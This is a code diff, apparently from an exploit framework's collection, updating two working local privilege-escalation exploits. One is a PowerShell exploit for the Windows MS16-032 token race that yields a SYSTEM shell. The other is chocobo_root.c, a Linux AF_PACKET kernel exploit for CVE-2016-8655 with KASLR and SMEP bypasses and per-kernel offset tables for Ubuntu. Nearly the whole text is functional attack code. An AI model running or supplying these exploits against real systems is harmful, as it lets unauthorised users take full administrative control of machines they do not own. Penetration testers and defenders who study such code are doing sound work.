+		$SQOS = New-Object SQOS
+		$SQOS.ImpersonationLevel = 2 #SecurityImpersonation
+		$SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
+		# Undocumented API's, I like your style Microsoft ;)
+		$CallResult = [Ntdll]::NtImpersonateThread($hThread, $hThread, [ref]$sqos)
+		if ($CallResult -ne 0) {
+			echo "[!] NtImpersonateThread failed, exiting.."
+			$CallResult = [Kernel32]::ResumeThread($hThread)
+			echo "[+] Thread resumed!"
+			Return
+		}
+		
+		# Null $SysTokenHandle
+		$script:SysTokenHandle = [IntPtr]::Zero
 
-        # CreateProcessWithLogonW --> lpCurrentDirectory
-        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
+		# 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
+		$CallResult = [Advapi32]::OpenThreadToken($hThread, 0x0006, $false, [ref]$SysTokenHandle)
+		if (!$CallResult) {
+			echo "[!] OpenThreadToken failed, exiting.."
+			$CallResult = [Kernel32]::ResumeThread($hThread)
+			echo "[+] Thread resumed!"
+			Return
+		}
+		
+		echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
+		echo "[+] Resuming thread.."
+		$CallResult = [Kernel32]::ResumeThread($hThread)
+	}
+	
+	# main() <--- ;)
+	$ms16032 = @"
+	 __ __ ___ ___   ___     ___ ___ ___ 
+	|  V  |  _|_  | |  _|___|   |_  |_  |
+	|     |_  |_| |_| . |___| | |_  |  _|
+	|_|_|_|___|_____|___|   |___|___|___|
+	                                    
+	               [by b33f -> @FuzzySec]
+"@
+	
+	$ms16032
+	
+	# Check logical processor count, race condition requires 2+
+	echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
+	if ($([System.Environment]::ProcessorCount) -lt 2) {
+		echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
+		Return
+	}
+	
+	echo "[>] Duplicating CreateProcessWithLogonW handle"
+	$hThread = Get-ThreadHandle
+	
+	# If no thread handle is captured, the box is patched
+	if ($hThread -eq 0) {
+		echo "[!] No valid thread handle was captured, exiting!`n"
+		Return
+	} else {
+		echo "[?] Done, using thread handle: $hThread"
+	} echo "`n[*] Sniffing out privileged impersonation token.."
+	
+	# Get handle to SYSTEM access token
+	Get-SystemToken
+	
+	# If we fail a check in Get-SystemToken, exit
+	if ($SysTokenHandle -eq 0) {
+		Return
+	}
+	
+	echo "`n[*] Sniffing out SYSTEM shell.."
+	echo "`n[>] Duplicating SYSTEM token"
+	$hDuplicateTokenHandle = [IntPtr]::Zero
+	$CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
+	
+	# Simple PS runspace definition
+	echo "[>] Starting token race"
+	$Runspace = [runspacefactory]::CreateRunspace()
+	$StartTokenRace = [powershell]::Create()
+	$StartTokenRace.runspace = $Runspace
+	$Runspace.Open()
+	[void]$StartTokenRace.AddScript({
+		Param ($hThread, $hDuplicateTokenHandle)
+		while ($true) {
+			$CallResult = [Advapi32]::SetThreadToken([ref]$hThread, $hDuplicateTokenHandle)
+		}
+	}).AddArgument($hThread).AddArgument($hDuplicateTokenHandle)
+	$AscObj = $StartTokenRace.BeginInvoke()
+	
+	echo "[>] Starting process race"
+	# Adding a timeout (10 seconds) here to safeguard from edge-cases
+	$SafeGuard = [diagnostics.stopwatch]::StartNew()
+	while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
 
-        $path1 = $env:windir
-        $path1 = "$path1\System32\cmd.exe"
-        # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
-        $CallResult = [Advapi32]::CreateProcessWithLogonW(
-            "user", "domain", "pass",
-            0x00000002, $path1, "",
-            0x00000004, $null, $GetCurrentPath,
-            [ref]$StartupInfo, [ref]$ProcessInfo)
+		# StartupInfo Struct
+		$StartupInfo = New-Object STARTUPINFO
+		$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+		
+		# ProcessInfo Struct
+		$ProcessInfo = New-Object PROCESS_INFORMATION
+		
+		# CreateProcessWithLogonW --> lpCurrentDirectory
+		$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
+		
+		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
+		$CallResult = [Advapi32]::CreateProcessWithLogonW(
+			"user", "domain", "pass",
+			0x00000002, $cmd, $args1,
+			0x00000004, $null, $GetCurrentPath,
+			[ref]$StartupInfo, [ref]$ProcessInfo)
+		
+		#---
+		# Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
+		#---
+		# Missing this check used to cause the exploit to fail sometimes.
+		# If CreateProcessWithLogon fails OpenProcessToken won't succeed
+		# but we obviously don't have a SYSTEM shell :'( . Should be 100%
+		# reliable now!
+		#---
+		if (!$CallResult) {
+			continue
+		}
+			
+		$hTokenHandle = [IntPtr]::Zero
+		$CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
+		# If we can't open the process token it's a SYSTEM shell!
+		if (!$CallResult) {
+			echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
+			$CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
+			$StartTokenRace.Stop()
+			$SafeGuard.Stop()
+			echo "$end"
+			Return
+		}
+			
+		# Clean up suspended process
+		$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
 
-        # Duplicate handle into current process -> DUPLICATE_SAME_ACCESS
-        $lpTargetHandle = [IntPtr]::Zero
-        $CallResult = [Kernel32]::DuplicateHandle(
-            $ProcessInfo.hProcess, 0x4,
-            [Kernel32]::GetCurrentProcess(),
-            [ref]$lpTargetHandle, 0, $false,
-            0x00000002)
-
-        # Clean up suspended process
-        $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
-
-        $lpTargetHandle
-    }
-
-    function Get-SystemToken {
-        echo "`n[?] Trying thread handle: $Thread"
-        echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)"
-
-        $CallResult = [Kernel32]::SuspendThread($Thread)
-        if ($CallResult -ne 0) {
-            echo "[!] $Thread is a bad thread, moving on.."
-            Return
-        } echo "[+] Thread suspended"
-
-        echo "[>] Wiping current impersonation token"
-        $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero)
-        if (!$CallResult) {
-            echo "[!] SetThreadToken failed, moving on.."
-            $CallResult = [Kernel32]::ResumeThread($Thread)
-            echo "[+] Thread resumed!"
-            Return
-        }
-
-        echo "[>] Building SYSTEM impersonation token"
-        # SecurityQualityOfService struct
-        $SQOS = New-Object SQOS
-        $SQOS.ImpersonationLevel = 2 #SecurityImpersonation
-        $SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
-        # Undocumented API's, I like your style Microsoft ;)
-        $CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos)
-        if ($CallResult -ne 0) {
-            echo "[!] NtImpersonateThread failed, moving on.."
-            $CallResult = [Kernel32]::ResumeThread($Thread)
-            echo "[+] Thread resumed!"
-            Return
-        }
-
-        $script:SysTokenHandle = [IntPtr]::Zero
-        # 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
-        $CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle)
-        if (!$CallResult) {
-            echo "[!] OpenThreadToken failed, moving on.."
-            $CallResult = [Kernel32]::ResumeThread($Thread)
-            echo "[+] Thread resumed!"
-            Return
-        }
-
-        echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
-        echo "[+] Resuming thread.."
-        $CallResult = [Kernel32]::ResumeThread($Thread)
-    }
-
-    # main() <--- ;)
-
-    # Check logical processor count, race condition requires 2+
-    echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
-    if ($([System.Environment]::ProcessorCount) -lt 2) {
-        echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
-        Return
-    }
-
-    # Create array for Threads & TID's
-    $ThreadArray = @()
-    $TidArray = @()
-
-    echo "[>] Duplicating CreateProcessWithLogonW handles.."
-    # Loop 1 is fine, this never fails unless patched in which case the handle is 0
-    for ($i=0; $i -lt 1; $i++) {
-        $hThread = Get-ThreadHandle
-        $hThreadID = [Kernel32]::GetThreadId($hThread)
-        # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
-        if ($TidArray -notcontains $hThreadID) {
-            $TidArray += $hThreadID
-            if ($hThread -ne 0) {
-                $ThreadArray += $hThread # This is what we need!
-            }
-        }
-    }
-
-    if ($($ThreadArray.length) -eq 0) {
-        echo "[!] No valid thread handles were captured, exiting!"
-        Return
-    } else {
-        echo "[?] Done, got $($ThreadArray.length) thread handle(s)!"
-        echo "`n[?] Thread handle list:"
-        $ThreadArray
-    }
-
-    echo "`n[*] Sniffing out privileged impersonation token.."
-    foreach ($Thread in $ThreadArray){
-
-        # Get handle to SYSTEM access token
-        Get-SystemToken
-
-        echo "`n[*] Sniffing out SYSTEM shell.."
-        echo "`n[>] Duplicating SYSTEM token"
-        $hDuplicateTokenHandle = [IntPtr]::Zero
-        $CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
-
-        # Simple PS runspace definition
-        echo "[>] Starting token race"
-        $Runspace = [runspacefactory]::CreateRunspace()
-        $StartTokenRace = [powershell]::Create()
-        $StartTokenRace.runspace = $Runspace
-        $Runspace.Open()
-        [void]$StartTokenRace.AddScript({
-            Param ($Thread, $hDuplicateTokenHandle)
-            while ($true) {
-                $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle)
-            }
-        }).AddArgument($Thread).AddArgument($hDuplicateTokenHandle)
-        $AscObj = $StartTokenRace.BeginInvoke()
-
-        echo "[>] Starting process race"
-        # Adding a timeout (10 seconds) here to safeguard from edge-cases
-        $SafeGuard = [diagnostics.stopwatch]::StartNew()
-        while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
-        # StartupInfo Struct
-        $StartupInfo = New-Object STARTUPINFO
-        $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
-
-        # ProcessInfo Struct
-        $ProcessInfo = New-Object PROCESS_INFORMATION
-
-        # CreateProcessWithLogonW --> lpCurrentDirectory
-        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
-
-        # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
-        $CallResult = [Advapi32]::CreateProcessWithLogonW(
-            "user", "domain", "pass",
-            0x00000002, $cmd, $args1,
-            0x00000004, $null, $GetCurrentPath,
-            [ref]$StartupInfo, [ref]$ProcessInfo)
-
-    #---
-    # Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
-    #---
-    # Missing this check used to cause the exploit to fail sometimes.
-    # If CreateProcessWithLogon fails OpenProcessToken won't succeed
-    # but we obviously don't have a SYSTEM shell :'( . Should be 100%
-    # reliable now!
-    #---
-    if (!$CallResult) {
-        continue
-    }
-
-        $hTokenHandle = [IntPtr]::Zero
-        $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
-
-        # If we can't open the process token it's a SYSTEM shell!
-        if (!$CallResult) {
-            echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
-            $CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
-            $StartTokenRace.Stop()
-            $SafeGuard.Stop()
-            Return
-        }
-
-        # Clean up suspended process
-        $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
-        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
-        }
-
-        # Kill runspace & stopwatch if edge-case
-        $StartTokenRace.Stop()
-        $SafeGuard.Stop()
-    }
-    exit
+	}
+	
+	# Kill runspace & stopwatch if edge-case
+	$StartTokenRace.Stop()
+	$SafeGuard.Stop()
+#}

data/exploits/CVE-2016-8655/chocobo_root.c

@@ -1,7 +1,7 @@
 /*
 chocobo_root.c
 linux AF_PACKET race condition exploit for CVE-2016-8655.
-Includes KASLR and SMEP/SMAP bypasses.
+Includes KASLR and SMEP bypasses. No SMAP bypass.
 For Ubuntu 14.04 / 16.04 (x86_64) kernels 4.4.0 before 4.4.0-53.74.
 All kernel offsets have been tested on Ubuntu / Linux Mint.
 
@@ -11,7 +11,7 @@ user@ubuntu:~$ uname -a
 Linux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 user@ubuntu:~$ id
 uid=1000(user) gid=1000(user) groups=1000(user)
-user@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread
+user@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread -Wall
 user@ubuntu:~$ ./chocobo_root
 linux AF_PACKET race condition exploit by rebel
 kernel version: 4.4.0-51-generic #72
@@ -75,7 +75,7 @@ Updated by <bcoles@gmail.com>
 - check number of CPU cores
 - KASLR bypasses
 - additional kernel targets
-https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
+https://github.com/bcoles/kernel-exploits/tree/master/CVE-2016-8655
 */
 
 #define _GNU_SOURCE
@@ -85,13 +85,13 @@ https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
 #include <pthread.h>
 #include <sched.h>
 #include <signal.h>
-#include <stdbool.h>
 #include <stdint.h>
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <unistd.h>
-
+#include <linux/if_packet.h>
+#include <netinet/in.h>
 #include <sys/klog.h>
 #include <sys/mman.h>
 #include <sys/types.h>
@@ -102,12 +102,6 @@ https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
 #include <sys/utsname.h>
 #include <sys/wait.h>
 
-#include <arpa/inet.h>
-#include <linux/if_packet.h>
-#include <linux/sched.h>
-#include <netinet/tcp.h>
-#include <netinet/if_ether.h>
-
 #define DEBUG
 
 #ifdef DEBUG
@@ -116,9 +110,18 @@ https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
 #  define dprintf
 #endif
 
-#define ENABLE_KASLR_BYPASS 1
+#define ENABLE_SYSTEM_CHECKS		1
+#define ENABLE_KASLR_BYPASS		1
 
-// Will be overwritten if ENABLE_KASLR_BYPASS
+#if ENABLE_KASLR_BYPASS
+#  define KERNEL_BASE_MIN		0xffffffff00000000ul
+#  define KERNEL_BASE_MAX		0xffffffffff000000ul
+#  define ENABLE_KASLR_BYPASS_KALLSYMS	1
+#  define ENABLE_KASLR_BYPASS_SYSLOG	1
+#  define ENABLE_KASLR_BYPASS_MINCORE	1
+#endif
+
+// Will be overwritten if ENABLE_KASLR_BYPASS is enabled (1)
 unsigned long KERNEL_BASE = 0xffffffff81000000ul;
 
 // Will be overwritten by detect_versions()
@@ -131,6 +134,7 @@ const char *SYSCTL_PATH = "/proc/sys/hack";
 volatile int barrier = 1;
 volatile int vers_switcher_done = 0;
 
+// kernel target struct
 struct kernel_info {
     char *kernel_version;
     unsigned long proc_dostring;
@@ -139,6 +143,7 @@ struct kernel_info {
     unsigned long set_memory_rw;
 };
 
+// Targets
 struct kernel_info kernels[] = {
     { "4.4.0-21-generic #37~14.04.1-Ubuntu", 0x084220, 0xc4b000, 0x273a30, 0x06b9d0 },
     { "4.4.0-22-generic #40~14.04.1-Ubuntu", 0x084250, 0xc4b080, 0x273de0, 0x06b9d0 },
@@ -170,6 +175,16 @@ struct kernel_info kernels[] = {
     { "4.4.0-47-generic #68-Ubuntu", 0x088040, 0xe48f80, 0x287800, 0x06f320 },
     //{"4.4.0-49-generic #70-Ubuntu",0x088090,0xe48f80,0x287d40,0x06f320},
     { "4.4.0-51-generic #72-Ubuntu", 0x088090, 0xe48f80, 0x2879a0, 0x06f320},
+
+    { "4.4.0-21-lowlatency #37-Ubuntu",  0x88960, 0xe48e80, 0x28c3a0, 0x6fae0 },
+    { "4.4.0-22-lowlatency #40-Ubuntu",  0x889c0, 0xe48f00, 0x28c570, 0x6fae0 },
+    { "4.4.0-24-lowlatency #43-Ubuntu",  0x88ae0, 0xe48f00, 0x28c9a0, 0x6fae0 },
+    { "4.4.0-28-lowlatency #47-Ubuntu",  0x88b20, 0xe48f80, 0x28ce20, 0x6fae0 },
+    { "4.4.0-31-lowlatency #50-Ubuntu",  0x88b20, 0xe48f80, 0x28cf10, 0x6fae0 },
+    { "4.4.0-34-lowlatency #53-Ubuntu",  0x88b20, 0xe48f80, 0x28cf50, 0x6fae0 },
+    { "4.4.0-36-lowlatency #55-Ubuntu",  0x88b00, 0xe48f80, 0x28cf30, 0x6fad0 },
+    { "4.4.0-38-lowlatency #57-Ubuntu",  0x88bd0, 0xe48f80, 0x28d580, 0x6fad0 },
+    { "4.4.0-42-lowlatency #62-Ubuntu",  0x88c30, 0xe48f80, 0x28d5b0, 0x6faa0 },
 };
 
 #define VSYSCALL              0xffffffffff600000
@@ -202,6 +217,7 @@ struct tpacket_req3 tp;
 int sfd;
 int mapped = 0;
 
+// timer_list struct defined in: include/linux/timer.h
 struct timer_list {
     void *next;
     void *prev;
@@ -255,6 +271,10 @@ void *vers_switcher(void *arg)
 #define BUFSIZE 1408
 char exploitbuf[BUFSIZE];
 
+#ifndef ETH_P_ARP
+#    define ETH_P_ARP 0x0806
+#endif
+
 void kmalloc(void)
 {
     while(1)
@@ -266,7 +286,7 @@ void pad_kmalloc(void)
     int x;
     for (x = 0; x < KMALLOC_PAD; x++)
         if (socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)) == -1) {
-            dprintf("[-] pad_kmalloc() socket error\n");
+            dprintf("[-] pad_kmalloc() socket error: %m\n");
             exit(EXIT_FAILURE);
         }
 }
@@ -289,7 +309,7 @@ int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
     sigaddset(&set, SIGSEGV);
 
     if (pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {
-        dprintf("[-] couldn't set sigmask\n");
+        dprintf("[-] couldn't set sigmask: %m\n");
         exit(1);
     }
 
@@ -300,7 +320,7 @@ int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
     fd = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
 
     if (fd == -1) {
-        dprintf("[-] target socket error\n");
+        dprintf("[-] target socket error: %m\n");
         exit(1);
     }
 
@@ -324,7 +344,7 @@ int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
     sfd = fd;
 
     if (pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {
-        dprintf("[-] Error creating thread\n");
+        dprintf("[-] Error creating thread: %m\n");
         return 1;
     }
 
@@ -360,7 +380,7 @@ int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
     pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);
 
     if (pbd == MAP_FAILED) {
-        dprintf("[-] could not map pbd\n");
+        dprintf("[-] could not map pbd: %m\n");
         exit(1);
     } else {
         off = pbd->hdr.bh1.offset_to_first_pkt;
@@ -415,13 +435,13 @@ void *modify_vsyscall(void *arg)
     sigaddset(&set, SIGSEGV);
 
     if (pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {
-        dprintf("[-] couldn't set sigmask\n");
+        dprintf("[-] couldn't set sigmask: %m\n");
         exit(EXIT_FAILURE);
     }
 
     signal(SIGSEGV, catch_sigsegv);
 
-    *vsyscall = 0xdeadbeef+x;
+    *vsyscall = 0xdeadbeef + x;
 
     if (*vsyscall == 0xdeadbeef+x) {
         dprintf("[~] vsyscall page altered!\n");
@@ -449,7 +469,7 @@ void verify_stage1(void)
             exit(0);
         }
 
-        write(2,".",1);
+        write(2, ".", 1);
         sleep(1);
     }
 
@@ -471,7 +491,7 @@ void verify_stage2(void)
             exit(0);
         }
 
-        write(2,".",1);
+        write(2, ".", 1);
         sleep(1);
     }
 
@@ -548,7 +568,29 @@ void wrapper(void)
 
 // * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *
 
-void check_procs() {
+#define CHUNK_SIZE 1024
+
+int read_file(const char* file, char* buffer, int max_length) {
+    int f = open(file, O_RDONLY);
+    if (f == -1)
+        return -1;
+    int bytes_read = 0;
+    while (1) {
+        int bytes_to_read = CHUNK_SIZE;
+        if (bytes_to_read > max_length - bytes_read)
+            bytes_to_read = max_length - bytes_read;
+        int rv = read(f, &buffer[bytes_read], bytes_to_read);
+        if (rv == -1)
+            return -1;
+        bytes_read += rv;
+        if (rv == 0)
+            return bytes_read;
+    }
+}
+
+#define PROC_CPUINFO_LENGTH 4096
+
+void check_env() {
     int min_procs = 2;
 
     int nprocs = 0;
@@ -559,7 +601,24 @@ void check_procs() {
         exit(EXIT_FAILURE);
     }
 
-    dprintf("[.] system has %d processor cores\n", nprocs);
+    char buffer[PROC_CPUINFO_LENGTH];
+    char* path = "/proc/cpuinfo";
+    int length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);
+    if (length == -1) {
+        dprintf("[-] open/read(%s): %m\n", path);
+        exit(EXIT_FAILURE);
+    }
+
+    char* found = memmem(&buffer[0], length, "smap", 4);
+    if (found != NULL) {
+        dprintf("[-] SMAP detected, no bypass available\n");
+        exit(EXIT_FAILURE);
+    }
+
+    struct stat st;
+    if (stat("/dev/grsec", &st) == 0) {
+        dprintf("[!] Warning: grsec is in use\n");
+    }
 }
 
 struct utsname get_kernel_version() {
@@ -573,10 +632,11 @@ struct utsname get_kernel_version() {
 }
 
 #define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+#define KERNEL_VERSION_SIZE_BUFFER 512
 
 void detect_versions() {
     struct utsname u;
-    char kernel_version[512];
+    char kernel_version[KERNEL_VERSION_SIZE_BUFFER];
 
     u = get_kernel_version();
 
@@ -591,7 +651,7 @@ void detect_versions() {
     }
 
     char *u_ver = strtok(u.version, " ");
-    snprintf(kernel_version, 512, "%s %s", u.release, u_ver);
+    snprintf(kernel_version, KERNEL_VERSION_SIZE_BUFFER, "%s %s", u.release, u_ver);
 
     int i;
     for (i = 0; i < ARRAY_SIZE(kernels); i++) {
@@ -607,15 +667,17 @@ void detect_versions() {
 }
 
 // * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
+// https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
 
+#if ENABLE_KASLR_BYPASS_SYSLOG
 #define SYSLOG_ACTION_READ_ALL 3
 #define SYSLOG_ACTION_SIZE_BUFFER 10
 
-bool mmap_syslog(char** buffer, int* size) {
+int mmap_syslog(char** buffer, int* size) {
     *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
     if (*size == -1) {
         dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\n");
-        return false;
+        return 0;
     }
 
     *size = (*size / getpagesize() + 1) * getpagesize();
@@ -625,16 +687,17 @@ bool mmap_syslog(char** buffer, int* size) {
     *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
     if (*size == -1) {
         dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL)\n");
-        return false;
+        return 0;
     }
 
-    return true;
+    return 1;
 }
 
 unsigned long get_kernel_addr_trusty(char* buffer, int size) {
     const char* needle1 = "Freeing unused";
     char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
-    if (substr == NULL) return 0;
+    if (substr == NULL)
+        return 0;
 
     int start = 0;
     int end = 0;
@@ -642,22 +705,25 @@ unsigned long get_kernel_addr_trusty(char* buffer, int size) {
 
     const char* needle2 = "ffffff";
     substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
-    if (substr == NULL) return 0;
+    if (substr == NULL)
+        return 0;
 
     char* endptr = &substr[16];
-    unsigned long r = strtoul(&substr[0], &endptr, 16);
+    unsigned long addr = strtoul(&substr[0], &endptr, 16);
 
-    r &= 0xffffffffff000000ul;
+    addr &= 0xffffffffff000000ul;
 
-    return r;
+    if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+        return addr;
+
+    return 0;
 }
 
 unsigned long get_kernel_addr_xenial(char* buffer, int size) {
     const char* needle1 = "Freeing unused";
     char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
-    if (substr == NULL) {
+    if (substr == NULL)
         return 0;
-    }
 
     int start = 0;
     int end = 0;
@@ -666,17 +732,19 @@ unsigned long get_kernel_addr_xenial(char* buffer, int size) {
 
     const char* needle2 = "ffffff";
     substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
-    if (substr == NULL) {
+    if (substr == NULL)
         return 0;
-    }
 
     char* endptr = &substr[16];
-    unsigned long r = strtoul(&substr[0], &endptr, 16);
+    unsigned long addr = strtoul(&substr[0], &endptr, 16);
 
-    r &= 0xfffffffffff00000ul;
-    r -= 0x1000000ul;
+    addr &= 0xfffffffffff00000ul;
+    addr -= 0x1000000ul;
 
-    return r;
+    if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+        return addr;
+
+    return 0;
 }
 
 unsigned long get_kernel_addr_syslog() {
@@ -699,9 +767,12 @@ unsigned long get_kernel_addr_syslog() {
 
     return addr;
 }
+#endif
 
 // * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+// https://grsecurity.net/~spender/exploits/exploit.txt
 
+#if ENABLE_KASLR_BYPASS_KALLSYMS
 unsigned long get_kernel_addr_kallsyms() {
     FILE *f;
     unsigned long addr = 0;
@@ -713,7 +784,7 @@ unsigned long get_kernel_addr_kallsyms() {
     dprintf("[.] trying %s...\n", path);
     f = fopen(path, "r");
     if (f == NULL) {
-        dprintf("[-] open/read(%s)\n", path);
+        dprintf("[-] open/read(%s): %m\n", path);
         return 0;
     }
 
@@ -734,58 +805,23 @@ unsigned long get_kernel_addr_kallsyms() {
     dprintf("[-] kernel base not found in %s\n", path);
     return 0;
 }
-
-// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
-
-unsigned long get_kernel_addr_sysmap() {
-    FILE *f;
-    unsigned long addr = 0;
-    char path[512] = "/boot/System.map-";
-    char version[32];
-
-    struct utsname u;
-    u = get_kernel_version();
-    strcat(path, u.release);
-    dprintf("[.] trying %s...\n", path);
-    f = fopen(path, "r");
-    if (f == NULL) {
-        dprintf("[-] open/read(%s)\n", path);
-        return 0;
-    }
-
-    char dummy;
-    char sname[256];
-    char* name = "startup_64";
-    int ret = 0;
-    while (ret != EOF) {
-        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
-        if (ret == 0) {
-            fscanf(f, "%s\n", sname);
-            continue;
-        }
-        if (!strcmp(name, sname)) {
-            fclose(f);
-            return addr;
-        }
-    }
-
-    fclose(f);
-    dprintf("[-] kernel base not found in %s\n", path);
-    return 0;
-}
+#endif
 
 // * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
 
+#if ENABLE_KASLR_BYPASS_MINCORE
 unsigned long get_kernel_addr_mincore() {
-    unsigned char buf[getpagesize()/sizeof(unsigned char)];
+    unsigned char buf[getpagesize() / sizeof(unsigned char)];
     unsigned long iterations = 20000000;
     unsigned long addr = 0;
 
     dprintf("[.] trying mincore info leak...\n");
+
     /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
     if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE,
-        MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
-        dprintf("[-] mmap()\n");
+          MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
+        dprintf("[-] mmap(): %m\n");
         return 0;
     }
 
@@ -793,46 +829,50 @@ unsigned long get_kernel_addr_mincore() {
     for (i = 0; i <= iterations; i++) {
         /* Touch a mishandle with this type mapping */
         if (mincore((void*)0x86000000, 0x1000000, buf)) {
-            dprintf("[-] mincore()\n");
+            dprintf("[-] mincore(): %m\n");
             return 0;
         }
 
         int n;
-        for (n = 0; n < getpagesize()/sizeof(unsigned char); n++) {
+        for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
             addr = *(unsigned long*)(&buf[n]);
             /* Kernel address space */
-            if (addr > 0xffffffff00000000) {
+            if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
                 addr &= 0xffffffffff000000ul;
                 if (munmap((void*)0x66000000, 0x20000000000))
-                    dprintf("[-] munmap()\n");
+                    dprintf("[-] munmap(): %m\n");
                 return addr;
             }
         }
     }
 
     if (munmap((void*)0x66000000, 0x20000000000))
-        dprintf("[-] munmap()\n");
+      dprintf("[-] munmap(): %m\n");
 
     dprintf("[-] kernel base not found in mincore info leak\n");
     return 0;
 }
+#endif
 
 // * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
 
 unsigned long get_kernel_addr() {
     unsigned long addr = 0;
 
+#if ENABLE_KASLR_BYPASS_KALLSYMS
     addr = get_kernel_addr_kallsyms();
     if (addr) return addr;
+#endif
 
-    addr = get_kernel_addr_sysmap();
-    if (addr) return addr;
-
